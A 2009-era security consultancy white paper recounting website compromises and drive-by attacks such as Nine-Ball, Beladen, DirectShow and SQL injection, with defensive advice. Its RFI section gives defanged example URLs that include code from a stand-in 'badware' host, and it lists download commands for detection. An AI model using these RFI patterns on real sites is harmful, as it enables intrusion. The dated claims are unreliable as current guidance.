High value sites that have been recently hacked or infected | Beladen drive-by malware, nine ball, SQL and java injection attacks

The "No Network is 100% Secure" series
- High Value Site Hacks, 2010 edition -
- In the news -
A White Paper

Vulnerability test: There is no malware on this page. However, if you received three pop-up messages, your computer is vulnerable to java injection drive-by exploitation. You might want to look into installing a safer browser!

If you did not receive three pop-up java alert messages when you entered this page, that's a good sign that your browser is safe! Click on the "How vulnerable am I?" button above to run one more (completely safe) test. If a new window does NOT open, you are about as safe as you can be, at least until these hackers come up with some new exploit. Note that you still need to have ALL of your software (not just the operating system) patched to the latest level since there are lots of other ways to pick up trojans and viruses besides visiting a compromised, infected drive-by web site.

A recent study revealed that the average PC in the USA (including computers in a corporate environment) have over a dozen current vulnerabilities. And remember, these hackers only have to exploit one vulnerability and you're hacked! The same study confirmed that there is an over-dependance on anti-virus software to keep computers safe. This is an absolute fallacy! AV software is a 1999 solution to a 2009 problem. The drive-by attacks described in this white paper go largely unnoticed by AV software. If your computer failed any of our vulnerability tests, it's just a matter of when, not if, you get hacked.

Feedback: We value the opinion of IT professionals. If you have comments about this series of white papers (too detailed, not detailed enough, helful, boring, or whatever) we would appreciate hearing from you. The information contained in these white papers is intended to help IT Managers better secure their networks. The more on-point our white papers are, the more useful the information will be to our target audience. Thanks in advance!

Summary: A great many computer users pay little attention to the security issues listed here. This is largely due to an [unfounded] reliance that they are safe because they have a firewall and anti virus software installed. The fact is that the majority of the exploits mentioned here go largely unnoticed by firewalls and AV software, which is why there are many millions of PCs currently infected and functioning as bots for the criminal network. And if that wasn't bad enough, there are some 60,000 legitimate web sites currently under the control of criminal hackers with more added every day. If you provide any personal information on any of these sites, you are just asking to have your identity stolen. Or worse. So any time any web site requires that you create an account, *ALWAYS* use a throw-away e-mail address and a throw-away password. Never, ever use a password that you also use in any account that you don't want hacked. And if a web site wants your social security number, drivers license number, mother's maiden name or anything that is frankly none of their business, dump your browser session immediately. These sites are either hacked or are operated by morons. In either case, a hasty exit is in order. There's more hacking information here.

Directshow vulnerability: This will likely become a popular form of exploit. The DirectShow vulnerability is interesting for a number of reasons. Some of the first pages to use this exploit in the wild were linked from phishing pages. The phishing pages not only attempt to steal the visitors' login credentials, but also silently redirected users to a malicious Web page hosting an exploit for the DirectShow vulnerability (CVE-2009-1537). This malicious Web page loads a corrupt .avi file that exploits the vulnerability and also loads some additional malicious .dlls to facilitate reliable exploitation of the user's machine as a bot. The malicious .dlls in turn download an encoded .exe payload that leads to Trojan.Cipevas being loaded on to the victim's machine. Trojan.Cipevas then connects back to the attackers' website and waits for further commands from the attacker. The phishing component of this exploit is a fake Windows Live login screen. There is currently (as of 6-19-09) no patch for the Directshow vulnerability.

Details: The vulnerability exists in the code within Microsoft DirectX and can be triggered by a specially crafted QuickTime media file. The attackers Web page will try to play the malicious QuickTime file, not using the QuickTime player, but using Windows Media Player instead. This will trigger the vulnerability and allow the attacker to execute code on the visitor's computer. The vulnerable code exists in quartz.dll. This vulnerability does not exist in Vista or Windows Server 2008.

Yet another java script injection exploit: June 22, 2009. The official Web site of the Ethiopian Embassy in Washington, D.C., has been compromised with malicious code. The Web site has been injected with obfuscated JavaScript (the code is in an Iframe). The code redirects users to sites that deliver malicious software that is installed without needing any explicit user interaction. If your computer failed the vulnerability tests on this page, your computer would likely be automatically infected simply by visiting any one of the estimated 80,000 legitimate web sites like this embassy site which have been compromised by hackers.

Nine-ball mass injection attack: Discovered on 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine. The obfuscation code injected into these legitimate Web sites is somewhat random, but the deobfuscation algorithm is consistant amongst all the infections. The algorithm uses the JavaScript method "String.fromCharCode" to convert a chunk of decimal values to a string. The string obtained after deobfuscation is an iframe that eventually leads to an exploit site. After redirection, the exploit payload site returns highly obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a Trojan dropper with low AV detection rate. This dropper drops a dll with the name SOCKET2.DLL to Windows' system folder. This file is used to steal user information. The malicious PDF file, served by the exploit site, also has very low AV detection rate. This exploit is also known as ninetoraq

How embarassing!: EWeek.com, a technology news site owned by Ziff Davis Enterprise, in February, 2009 displayed an ad on its homepage masquerading as a promotion for Lacoste, the shirt maker. The retailer hadn't placed the ad -- a hacker had, to direct users to a Web site where harmful programs would be downloaded to their computers, says Stephen Wellman, director of community and content for Ziff Davis. Viruses can be incorporated directly within an ad, so that simply clicking on the ad or visiting the site can infect a computer, or ads can be used to direct users to a nefarious Web site that aims to steal passwords or identities.

The Web site of Fort William Mountain Bike World Cup 2009 :has been hijacked by attackers, and redirects users to rogue AV sites if they visit the site through well-known search engines such as Google, Yahoo, and MSN. June 24, 2009. This site has been injected by the Nine-Ball malicious code twice this month. Now, the injected code has been cleaned but system control has been lost without the administrator's knowledge. Once the attackers gained system control, they likely made small changes to the configuration of the Web server to redirect any visitors to rogue AV Web sites if arriving at the site via search engines. This is a clear reminder to Web masters that a full examination of the whole system is necessary after removing code injections.

British Government sites and schools hacked: London, June 15, 2009. Hackers have taken over hundreds of government, school and university websites in Britain, which direct users to pornographic websites. All the websites were affected in different ways. Some contained inappropriate links on their home pages and others contained drive-by malware. The hackers were apparently motivated by the money they could earn from porn sites by boosting their traffic. The compromised web sites also direct people to criminal web sites that sell products such as Viagra and hardcore pornography. These sites will attempt to install viruses or malware on people's computers for identity theft and various other purposes. It is possible to see which sites have been hacked by typing into Google's search engine, "inurl:ac.uk", in order to limit the search to British education websites and then adding a phrase such as "buy viagra".

Beladen massive injection infections: June 11, 2009. The number of web sites infected with malicious code inserted by the Beladen massive injection is now estimated to be around 20,000 worldwide. The attackers who have taken control of these legitimate business web sites are expected to upgrade their attack drive-by malware very soon. However at this time, antivirus detection of the existing malware is said to be low. If any of your users have visited any of these sites, it is quite likely that your entire network is infected and you don't even know it.

Canadian MSN Sympatico web site : has been compromised with malicious code on June 10, 2009. The site's home page, index.php, was compromised and infected with an obfuscated JavaScript iframe redirect to a known server of malware with an explicit domain name.

Twitter: June 3, 2009. In our opinion, subscribing to social networking sites such as Twitter is just asking for trouble. There are too many and too frequent hacks, cracks and phishing goings-on there for any sane person to want to be part of it. To list all of them would take up pages and pages of HTML, so suffice it to post this: The latest malware attack on the social network links to a video hosted on a site that installs scareware as victims watch the video. Duh.... if you liked Kazaa's malware, you'll love Twitter.

June 18, 2009: We're seeing a wave of fake Twitter invitations that come carrying a mass-mailing worm. The observed messages appear as if they have been sent from a Twitter account; however, unlike a legitimate Twitter message, there is no invitation URL present in the body. Instead, the user will see an attachment that appears as a .zip file that purportedly contains an invitation card. Invitation Card.zip is the name of the malicious attachment, and it is being identified as W32.Ackantta.B@mm, which was first discovered in an e-card virus attack in February, 2009. W32.Ackantta.B@mm is a mass-mailing worm that gathers email addresses from the compromised computer and spreads by copying itself to removable drives and shared folders.

Most companies restrict the personal use of company computers. Others have policies that totally forbid personal computing on company time using company equipment. Accessing Twitter, Facebook, Instant Messaging (IM) and so on could be grounds for termination. And if your work PC gets infected because you visited Twitter and the infection spreads throughout your company... well... you can probably kiss your job good-bye. Any good IT guy will be able to trace a virus back to it's source so you really need to think about how important your paycheck is to you before you go places that you shouldn't.

U.S. Army: May 30, 2009. An anti-American group of hackers have broken into at least two of the US Army's critical web servers. This despite the advanced security and antivirus software the Defense department's has in place. The group, based in Turkey, call themselves the "m0sted", They broke into servers at the Army's McAlester Ammunition Plant in McAlester, Oklahoma on January 26, 2009 and previously at the US Army Corps of Engineers' Transatlantic Center in Winchester, Virginia on September 19, 2007. In the case of the McAlester Ammunitions plant breach, visitors who were trying to access the plant's website found themselves redirected to a page that featured a m0sted-led protest against climate change. In the Army Corps of Engineers' attack, the hackers sent website vistorsto www.m0sted.net, which at the time contained anti-American and anti-Israeli messages and images. It is still not clear as to whether the hackers managed to steal any sensitive data from the Army's servers. According to officials, the hackers broke into the web servers by using an SQL injection where they successfully exploited a security vulnerability in Microsoft's SQL Server database. In the past, the same hackers performed similar attacks on many other websites, including an attack in July 2008 against a site operated by international computer security firm Kaspersky Lab.

The website of the Communist Party Of Britain: has been infected with malicious code. June 6, 2009. Infection by the iFrame-F script coincided with local and European election in the UK, marking a time when the minority party website would have had far more visitors than normal. The affected file on the website is associated with serving up Microsoft Silverlight script, suggesting an important part of the site's multimedia environment was affected by the security breach. The malicious code (inserted in a file called silverlight.js) serves up an iFrame that points to a malicious Google-spoofing website in China. The Communist Party's website infection is invisible to the naked eye. But buried inside the code of a plugin for these malicious webpages. The code is designed to deliver funky animation and video effects to website visitors - but actually tries to invisibly download malicious code from web servers based in China and Russia."

More embarrassment - another computer expert hacked!: June 25, 2009. ZDNet's own Ryan Naraine reports in his Zero Day security blog that Mac evangelist Guy Kawasaki's Twitter account was hijacked yesterday and was used in an attempt to distribute malware to his almost 140,000 followers. The attack included a link to what purported to be a "sex tape video free download" linked to Gossip Girls star Leighton Meester. But, after a series of clicks, the end result was a malicious Trojan. The payload at the end of the mal-Tweet was especially dangerous to both PCs and Macs. In this case, the link would lead to a malicious website designed to infect both Macs and PCs with a DNS changing Trojan which at the time of writing has low-to non-existent detection rates by security vendors. Luckily, the offending tweet reeked so badly of SPAM that it probably limited the scope of its damage. If the hacker was a little more nefarious and used the account to Tweet things in a more Kawasaki-like way, i.e. "7 Sneaky (and useful) ways to use Twitter search" the damage could have been much more extensive. In fact, Kawasaki's use of team-Twittering could have allowed a rogue Tweeter to fly under the radar for quite a while. Now would probably be a good time to change your Twitter password, just in case.

Remote File Inclusion (RFI) attacks: One of the potentially most dangerous emerging security threats to the Internet isn't even showing up on antivirus radar. Currently, an estimated 52,000 Websites are infected with at least one exploit by RFI in a blended attack, and there are many more that remain uncounted. None are being picked up by Google's Safe Browsing checks or McAfee's Site Advisor, and only one of the top 40 antivirus vendors shows even a potential problem. RFI is a hacking technique that allows attackers to remotely run PHP code on victims' Websites. It is based on exploitation of vulnerabilities within Web applications. RFI attacks are difficult to trace. The files are not usually tagged as malware because they do not modify system files, registry keys, etc. They typically target only Unix-based Web servers and use normal PHP or Unix commands. They do not usually deploy things like malware packers, which makes them difficult to track by antivirus vendors that rely on packers to find hostile code.

Also, the presence of an RFI identification file that has been maliciously added or injected into a Website does not necessarily indicate a successful attack. It simply indicates an attempt. But that attempt could be a major disaster waiting to happen, one that could unravel a company's business.

RFI is historically used by hackers for defacing purposes. However, by loading their shell onto a Web server hacked via RFI vulnerability hackers can also gain access to customer data stored on the server. In blended attacks, RFI can be combined with a XSA (Cross-Server Attack) to harm or even hijack a Web server. This whole area becomes really dangerous to Web security, since attackers could use RFI as a botnet builder, turning the Web server into a powerful DDoS (distributed denial of service) tool. RFI Web server attacks also employ a type of "downloader" much like Windows malware, which comprises a list of Unix commands that download additional bot code when executed. Downloaders can be detected by writing a script/signature that looks for the presence of the commands wget, curl, lwp-download, fetch, and get. Webmasters also need to check that they are using the latest software versions and look for malicious redirects within their Websites. A simple check is the obvious "txt?" since many RFI exploits end with a question mark. Internet surfers should avoid clicking on oddball URLs featuring .txt files. (Remember, such URLS can easily be masked with a "click here.") Check out the following examples of URLs containing code to attack a Website:

hxxp://badware.com/shop/FX29ID.txt
hxxp://info.mywebsite.com/index.php?page=hxxp://rfi.badware.com/pawned/FX29ID.txt?

Again, note that such redirects can also be masked and inadvertently clicked on in spam or from a compromised Website ad.

About the Author

Frank Saxton is a computer network security engineer and Easyrider LAN Pro principle. Home-based in Portland, Oregon, Frank has been designing remote diagnostic and network enterprise monitoring centers since the late 1970s. Prior to becoming a professional systems engineering consultant in 1990, Frank had a 20 year career in computer systems field engineering and field engineering management. Frank has a BSEE from Northeastern University and holds several certifications including Network General's Certified Network Expert (CNX). As a NOC design engineer and architect, Frank works regularly with enterprise-class monitoring tools such as HP Openview Operations, BMC Patrol and others. In his enterprise security audit work, Frank uses sniffers and other professional grade monitoring tools on a daily basis.

Next in the security white paper series:

How Cyber Criminals will mature over the next ten years
More 2009 High profile hacks in the news
Still more 2009 hacks in the news
Firewall White Paper
Are you vulnerable to drive-by exploits?
IT employment challenges of the 21st century
Employment reference checking white paper
Competency Certifications White Paper
ISO/IEC 27005:2008 Standard for Security Risk Management
Password White Paper
Digital Identification Certificates White Paper
Virus White Paper
Ghostnet White Paper
Cryptography White Paper
OpenID White Paper
Intrusion Detection Systems IDS White Paper
Rootkit White Paper
Unnecessary Windows XP Services White Paper
Scareware White Paper
Exaflood Internet Brownout White Paper
Cloud Computing White Paper
Proxy Server White Paper
Personal Computer PC Security White Paper
Phishing White Paper
DNS Poisoning White Paper
Conficker White Paper
SPAM White Paper
Best Practices White Paper
Denial of Service DoS White Paper
Trojan Virus Attacks White Paper
Port Scanning White Paper
Monitoring Basics 101 White Paper
Monitoring Basics 102 White Paper
Monitoring Basics 103 White Paper
Virtual Machine Security White Paper
Aurora vulnerability White Paper
Shelfware White Paper
Outsourcing White Paper

Easyrider LAN Pro Consulting services:

Network Security Audit and PC Tune-up service
Portland, Oregon Network Security Consulting

- Proxy server installation and configuration
- Enterprise security consultations
- Disaster recovery planning
- Disaster recovery services
- Capacity, migration and upgrade planning
- Build and deploy central syslog server
- Build trouble ticket systems
- Design and build monitoring environments
- Design and build Network Operations Centers (NOC)
- HP Openview, BMC Patrol consulting